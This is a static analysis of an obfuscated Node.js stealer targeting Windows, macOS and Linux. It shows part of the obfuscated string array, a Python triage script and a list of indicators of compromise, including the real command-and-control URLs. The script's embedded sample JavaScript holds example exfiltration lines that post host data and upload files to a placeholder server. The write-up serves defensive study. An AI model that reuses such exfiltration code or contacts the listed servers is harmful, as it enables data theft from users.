Cross-Platform NPM Stealer
I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as “extracted-decoded.js” (and reformatted). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox, so only a static analysis was performed.
The key point is that it is a cross-platform stealer targeting Windows (WSL), macOS and Linux. Good news for us: only the “wrapper” that is responsible for the execution is obfuscated, while the malicious payloads are embedded in plain text! The obfuscation technique looks typical of the code produced by obfuscator.io[2]. We are facing a very long array of small Base64-encoded strings:
function c() { const t8 = ["W54gaGuj", "pSkByhzh", "WRT/WPThyG", "CSomW6OXWQG", "WO7dIuVcTaq", "AYb2Axm", "WPT3WPJdLmkS", "WPTNeuWa", "hCkIW64XW7C", "W47cM0tcObS", "WPKbWOKfW74", "W6JdNCkDWRe+", "W53dLuxcP3u", "WRTUc8ocW4W", "ysiSica", "wCo4oser", "tSkAW5v3ca", "W54XaKvz", "W7nTe8ooW7a", "W4BcSSo/FLi", "W6HvW7i+FG", "W5iBabul", "F8oQW4JcVCku", "W5ldPCkKbcy", "W6ddQcdcNq0", "Aw5Niha", "Dcy9W5dcVq", "C8o/eqBcHW", "id0GBMu", "W5FcISkyW4FcJG", "WR1ieSotW4y", "wSoqq8o1da", "B3jKvMe", "icDmB2m", "uSkgW4qZiq", "WO7cMSkoW7zX", "W5HxW6OnW7S", …
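Because only the wrapper is obfuscated and the payloads sit in clear text, a quick static triage can locate the obfuscator.io-style string table and harvest the plain-text indicators around it. The following is an added example, not code from the diary or from the sample; the JavaScript input is constructed to mimic the layout described above (the IP in it is a documentation-range placeholder, not the real indicator), and the string table is deliberately not decoded, since the obfuscator's decoder is file-specific and the page only shows the array.

```python
import re

# Constructed sample: an obfuscator.io-style string table in the wrapper plus a
# plain-text payload with its C2 endpoints. 192.0.2.10 is an RFC 5737 placeholder.
SAMPLE_JS = r'''
function c() { const t8 = ["W54gaGuj", "pSkByhzh", "WRT/WPThyG", "CSomW6OXWQG",
 "WO7dIuVcTaq", "AYb2Axm", "WPT3WPJdLmkS", "WPTNeuWa", "hCkIW64XW7C", "W47cM0tcObS"];
 c = function () { return t8; }; return c(); }
const payload = `
const axios = require("axios");
axios.post("http://192.0.2.10:8087/api/notify", {host: require("os").hostname()});
fs.createReadStream(f).pipe(request.post("http://192.0.2.10:8086/upload"));
`;
'''

ARRAY_RE = re.compile(r'const\s+(\w+)\s*=\s*\[((?:\s*"[^"]*"\s*,?)+)\]')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+=*$')           # base64 alphabet only
URL_RE = re.compile(r"""https?://[^\s"'`)]+""")
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def find_string_arrays(js, min_entries=8, max_len=16):
    """Return (name, entries) for every array made of many short base64-alphabet
    strings: the shape obfuscator.io emits for its rotated string table."""
    found = []
    for m in ARRAY_RE.finditer(js):
        entries = re.findall(r'"([^"]*)"', m.group(2))
        if len(entries) >= min_entries and all(
                B64_RE.match(e) and len(e) <= max_len for e in entries):
            found.append((m.group(1), entries))
    return found

def extract_plaintext_iocs(js):
    """Harvest URLs and IPv4 addresses that survive in clear text in the file."""
    return {"urls": sorted(set(URL_RE.findall(js))),
            "ips": sorted(set(IPV4_RE.findall(js)))}

def triage(js):
    """Summarise the file: string tables found and clear-text network indicators."""
    tables = [(name, len(entries)) for name, entries in find_string_arrays(js)]
    return {"string_tables": tables, **extract_plaintext_iocs(js)}

if __name__ == "__main__":
    print(triage(SAMPLE_JS))
```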
IoC
https://github.com/axios/axios
http://216.126.225.243:8087/api/notify
https://www.virustotal.com/gui/file/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9
https://socket.dev/blog/north-korea-contagious-interview-npm-attacks
http://216.126.225.243:8086/upload
https://obfuscator.io
216.126.225.243
049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9